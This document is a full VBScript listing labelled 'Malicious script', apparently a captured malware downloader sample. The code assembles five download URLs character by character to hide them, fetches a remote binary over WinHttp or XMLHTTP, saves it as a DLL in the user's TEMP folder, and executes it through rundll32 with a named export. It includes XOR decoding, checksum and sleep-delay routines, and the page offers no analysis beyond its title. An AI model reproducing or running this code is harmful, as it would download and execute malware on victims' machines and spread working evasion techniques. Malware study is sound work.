Malicious script

1. On Error Resume Next
2. Const Kq2 = 1, Bl0 = 2, Ni = 8
3. Const RFl1 = 1, Eb = 2, Wl4 = 2
4. Const Fy = "437"
5. Function RSb6(Tv3)
6. Dim XSf(255), UYz, VEk8
7. XSf(128)=199
8. XSf(129)=252
9. XSf(130)=233
10. XSf(131)=226
11. XSf(132)=228
12. XSf(133)=224
13. XSf(134)=229
14. XSf(135)=231
15. XSf(136)=234
16. XSf(137)=235
17. XSf(138)=232
18. XSf(139)=239
19. XSf(140)=238
20. XSf(141)=236
21. XSf(142)=196
22. XSf(143)=197
23. XSf(144)=201
24. XSf(145)=230
25. XSf(146)=198
26. XSf(147)=244
27. XSf(148)=246
28. XSf(149)=242
29. XSf(150)=251
30. XSf(151)=249
31. XSf(152)=255
32. XSf(153)=214
33. XSf(154)=220
34. XSf(155)=162
35. XSf(156)=163
36. XSf(157)=165
37. XSf(158)=8359
38. XSf(159)=402
39. XSf(160)=225
40. XSf(161)=237
41. XSf(162)=243
42. XSf(163)=250
43. XSf(164)=241
44. XSf(165)=209
45. XSf(166)=170
46. XSf(167)=186
47. XSf(168)=191
48. XSf(169)=8976
49. XSf(170)=172
50. XSf(171)=189
51. XSf(172)=188
52. XSf(173)=161
53. XSf(174)=171
54. XSf(175)=187
55. XSf(176)=9617
56. XSf(177)=9618
57. XSf(178)=9619
58. XSf(179)=9474
59. XSf(180)=9508
60. XSf(181)=9569
61. XSf(182)=9570
62. XSf(183)=9558
63. XSf(184)=9557
64. XSf(185)=9571
65. XSf(186)=9553
66. XSf(187)=9559
67. XSf(188)=9565
68. XSf(189)=9564
69. XSf(190)=9563
70. XSf(191)=9488
71. XSf(192)=9492
72. XSf(193)=9524
73. XSf(194)=9516
74. XSf(195)=9500
75. XSf(196)=9472
76. XSf(197)=9532
77. XSf(198)=9566
78. XSf(199)=9567
79. XSf(200)=9562
80. XSf(201)=9556
81. XSf(202)=9577
82. XSf(203)=9574
83. XSf(204)=9568
84. XSf(205)=9552
85. XSf(206)=9580
86. XSf(207)=9575
87. XSf(208)=9576
88. XSf(209)=9572
89. XSf(210)=9573
90. XSf(211)=9561
91. XSf(212)=9560
92. XSf(213)=9554
93. XSf(214)=9555
94. XSf(215)=9579
95. XSf(216)=9578
96. XSf(217)=9496
97. XSf(218)=9484
98. XSf(219)=9608
99. XSf(220)=9604
100. XSf(221)=9612
101. XSf(222)=9616
102. XSf(223)=9600
103. XSf(224)=945
104. XSf(225)=223
105. XSf(226)=915
106. XSf(227)=960
107. XSf(228)=931
108. XSf(229)=963
109. XSf(230)=181
110. XSf(231)=964
111. XSf(232)=934
112. XSf(233)=920
113. XSf(234)=937
114. XSf(235)=948
115. XSf(236)=8734
116. XSf(237)=966
117. XSf(238)=949
118. XSf(239)=8745
119. XSf(240)=8801
120. XSf(241)=177
121. XSf(242)=8805
122. XSf(243)=8804
123. XSf(244)=8992
124. XSf(245)=8993
125. XSf(246)=247
126. XSf(247)=8776
127. XSf(248)=176
128. XSf(249)=8729
129. XSf(250)=183
130. XSf(251)=8730
131. XSf(252)=8319
132. XSf(253)=178
133. XSf(254)=9632
134. XSf(255)=160
135. s = ""
136. For VEk8 = 0 To UBound(Tv3)
137. If Tv3(VEk8) < 0 Or Tv3(VEk8) > 255 Then
138. Err.Raise 50003, "", "a2s()", "", 0
139. ElseIf Tv3(VEk8) >= 128 Then
140. UYz = UYz & ChrW(XSf(Tv3(VEk8)))
141. Else
142. UYz = UYz & ChrW(Tv3(VEk8))
143. End If
144. Next
145. RSb6 = UYz
146. End Function
147. Function Nu3(OPb)
148. Dim Xj, PTi, UYz
149. Set Xj = CreateObject("ADODB.Stream")
150. Xj.type = Eb
151. Xj.Charset = Fy
152. Xj.Open
153. Xj.LoadFromFile OPb
154. UYz = Xj.ReadText
155. Xj.Close
156. Nu3 = WFo3(UYz)
157. End Function
158. Sub So(OPb, Tv3)
159. Dim Xj, UYz
160. Set Xj = CreateObject("ADODB.Stream")
161. Xj.type = Eb
162. Xj.Charset = Fy
163. Xj.Open
164. UYz = RSb6(Tv3)
165. Xj.WriteText UYz
166. Xj.SaveToFile OPb, Wl4
167. Xj.Close
168. End Sub
169. Function PKe(Iu7)
170. Dim UYz, LVb(0)
171. If Iu7 <= 0 Then
172. Err.Raise 50001, "", "makearrr()", "", 0
173. ElseIf Iu7 = 1 Then
174. PKe = LVb
175. Else
176. UYz = Space(Iu7-1)
177. PKe = Split(UYz, " ")
178. End If
179. End Function
180. Function THv7(url)
181. Dim HWy, IWu8, PTi, VEk8
182. Dim Ze, BLm3(1)
183. Set HWy = CreateObject("Scripting.FileSystemObject")
184. BLm3(0) = "WinHttp.WinHttpRequest.5.1"
185. BLm3(1) = "MSXML2.XMLHTTP"
186. For Each Ze in BLm3
187. Err.Clear
188. Set IWu8 = CreateObject(Ze)
189. If Err.Number = 0 Then
190. Exit For
191. End If
192. Next
193. IWu8.Open "GET", url, False
194. IWu8.Send
195. PTi = PKe(LenB(IWu8.ResponseBody))
196. For VEk8 = 1 To LenB(IWu8.ResponseBody)
197. PTi(VEk8-1) = AscB(MidB(IWu8.ResponseBody, VEk8, 1))
198. Next
199. THv7 = PTi
200. End Function
201. Function Re1()
202. Dim IRj, Ji, UUr5
203. Set IRj = CreateObject("WScript.Shell")
204. Set Ji = IRj.Environment("System")
205. UUr5 = Ji("PROCESSOR_ARCHITECTURE")
206. If LCase(UUr5) = "amd64" Then
207. Re1 = IRj.ExpandEnvironmentStrings("%SystemRoot%\SysWOW64\rundll32.exe")
208. Else
209. Re1 = IRj.ExpandEnvironmentStrings("%SystemRoot%\system32\rundll32.exe")
210. End If
211. End Function
212. Sub LBd(Ix, Lw1, Ut)
213. Dim IRj, HWy, Mm, MOd4, KNf
214. Set IRj = CreateObject("WScript.Shell")
215. Set HWy = CreateObject("Scripting.FileSystemObject")
216. Set Mm = HWy.GetFile(Ix)
217. MOd4 = Mm.ShortPath
218. KNf = Re1() + " " + MOd4 + "," + Lw1 + " " + Ut
219. If 2 > 1 Then
220. IRj.Run(KNf)
221. End If
222. End Sub
223. Function Ty(Ix)
224. Dim HWy
225. Set HWy = CreateObject("Scripting.FileSystemObject")
226. Ty = HWy.FileExists(Ix)
227. End Function
228. Function Ex6(Ix)
229. Dim HWy, Mm
230. Set HWy = CreateObject("Scripting.FileSystemObject")
231. Set Mm = HWy.GetFile(Ix)
232. Ex6 = Mm.ShortPath
233. End Function
234. Function BWg(KQg2, Rd0)
235. Dim Iu7
236. Iu7 = CDbl(Int(CDbl(KQg2)/CDbl(Rd0)))
237. BWg = CDbl(KQg2) - Iu7 * CDbl(Rd0)
238. End Function
239. Function Vu(BBa, UYz)
240. UYz(1) = 172 * UYz(1) Mod 30307
241. UYz(0) = 171 * UYz(0) Mod 30269
242. UYz(2) = 170 * UYz(2) Mod 30323
243. Dim Xf3
244. Xf3 = BWg((CDbl(UYz(0))/30269.0 + CDbl(UYz(1))/30307.0 + CDbl(UYz(2))/30323.0), 1.0)
245. Vu = Int(Xf3 * CDbl(BBa))
246. End Function
247. Function Kx(PTi, RBu)
248. Dim PIq5(2), Pj1, Zi, Ya2, VEk8
249. If UBound(PTi) < 3 Then
250. Err.Raise 50004, "", "size of array muzt be >= 4", "", 0
251. End If
252. Pj1 = PKe(UBound(PTi) - 3)
253. PIq5(0) = RBu(0)
254. PIq5(1) = RBu(1)
255. PIq5(2) = RBu(2)
256. For VEk8 = 0 To UBound(PTi)
257. PTi(VEk8) = PTi(VEk8) Xor Vu(256, PIq5)
258. Next
259. Zi = PTi(UBound(PTi)-3)+(PTi(UBound(PTi)-2)*256)+(PTi(UBound(PTi)-1)*256*256)+(PTi(UBound(PTi))*256*256*256)
260. Ya2 = VUf9
261. For VEk8 = 0 To UBound(Pj1)
262. Pj1(VEk8) = PTi(VEk8)
263. Ya2 = (Ya2 + PTi(VEk8)) Mod 1000000000
264. Next
265. If Ya2 <> Zi Then
266. Err.Raise 50005, "", "checksum error", "", 0
267. End If
268. Kx = Pj1
269. End Function
270. Function GEq(TOv6)
271. GEq = CInt(TOv6*Rnd())
272. End Function
273. Sub Hx(Oi)
274. WScript.Sleep(Oi)
275. End Sub
276. Randomize
277. Dim WQa2(2), VUf9, VIb(4), OPb
278. WQa2(0) = 6575
279. WQa2(1) = 24677
280. WQa2(2) = 15342
281. VUf9 = 46
282. If 1=1 Then
283. VIb(0) = "http://" & "a" & "n" & "g" & "u" & "n" & "d" & "o" & "v" & "i" & "z" & "." & "c" & "o" & "m" & "/" & "l" & "h" & "k" & "9" & "6" & "w" & "x"
284. End If
285. If 1=1 Then
286. VIb(1) = "http://" & "a" & "1" & "p" & "l" & "u" & "s" & "2" & "." & "d" & "e" & "/" & "l" & "j" & "w" & "x" & "w" & "6" & "v" & "h"
287. End If
288. If 1=1 Then
289. VIb(2) = "http://" & "e" & "n" & "z" & "y" & "m" & "a" & "." & "e" & "s" & "/" & "l" & "p" & "z" & "d" & "1" & "g" & "e" & "v"
290. End If
291. If 1=1 Then
292. VIb(3) = "http://" & "z" & "l" & "o" & "t" & "y" & "s" & "a" & "l" & "m" & "o" & "." & "n" & "e" & "t" & "/" & "0" & "z" & "x" & "0" & "k" & "e" & "n" & "3"
293. End If
294. If 1=1 Then
295. VIb(4) = "http://" & "a" & "o" & "t" & "e" & "a" & "t" & "r" & "i" & "a" & "l" & "." & "n" & "e" & "t" & "/" & "1" & "4" & "2" & "y" & "5" & "x"
296. End If
297. OPb = "vJlvsuTTmqgiF"
298. Dim IRj, Lv, Ov6, Wg
299. Set objShell = CreateObject("WScript.Shell")
300. Lv = objShell.ExpandEnvironmentStrings("%" & "TEMP%")
301. Dim Ag, AKw8, Ab7, Hk, VEk8
302. AKw8 = False
303. For VEk8=0 To 10: Do
304. Ov6 = Lv + "\" + OPb + CStr(VEk8) + ".dll"
305. If Ty(Ov6) Then
306. Wg = Ex6(Ov6) & ".txt"
307. If Ty(Wg) Then
308. WScript.Quit(0)
309. End If
310. End If
311. If Not AKw8 Then
312. Ag = GEq(UBound(VIb))
313. Ab7 = THv7(VIb(Ag))
314. If Err.Number <> 0 Then
315. Exit Do
316. End If
317. Hk = Ab7  ' Kx(Ab7, WQa2)
318. If Err.Number <> 0 Then
319. Exit Do
320. End If
321. So Ov6, Hk
322. If Err.Number <> 0 Then
323. Exit Do
324. End If
325. AKw8 = True
326. End If
327. LBd Ov6, "E"&"nhancedStoragePasswordConfig", "147"
328. Hx 24899
329. Loop While False: Next
330. If 3=3 Then
331. WScript.Quit(1)
332. End If